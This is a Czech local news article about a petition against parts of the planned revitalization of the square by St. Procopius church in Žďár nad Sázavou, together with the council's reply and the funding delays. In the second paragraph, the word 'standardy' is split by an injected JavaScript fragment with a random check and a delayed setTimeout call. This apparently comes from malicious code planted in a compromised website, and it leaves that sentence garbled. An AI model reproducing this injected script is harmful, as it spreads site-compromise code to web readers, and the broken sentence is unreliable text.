Rainbow page separator

Úpravy před kostelem se lidem stále nelíbí, ohradili se peticí

Čtvrtek, 17. června 2021

Žďár nad Sázavou / Více než tři stovky lidí se podepsaly pod petici, která se dostala k vedení žďárské radnice. Petentům se nelíbí některé kroky plánované revitalizace prostranství u kostela svatého Prokopa a okolí budovy tvrze – konkrétně oproti projektu požadují zejména více stromů, místo navržené dlažby před kostelem trávník a také nejsou spokojeni se vzhledem nového vodního prvku. Projekt vznikl v roce 2019, přičemž někteří obyvatelé už tehdy vznesli námitky, z nichž některé byly poté do dokumentace zapracovány. Jiné však ne, a proto se někteří lidé, a to zejména z řad farníků, ohradili prostřednictvím petice.
K ní se již vyjádřili žďárští radní v tom smyslu, že řešení prostoru navržené renomovanými odborníky je adekvátní s tím, že zmizí pouze ekologicky méně hodnotná zeleň a ostatní se zkvalitní. Vydláždění až ke kostelu bude navíc v souladu se standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardy z obdobných lokalit jiných evropských měst.
V současně době však není jasné, kdy k revitalizaci lokality za zhruba dvaatřicet milionů korun dojde. Původně to mělo být už v loňském a letošním roce, nicméně kvůli úsporným koronavirovým opatřením dostaly přednost rozpracované nebo dlouhodobé projekty.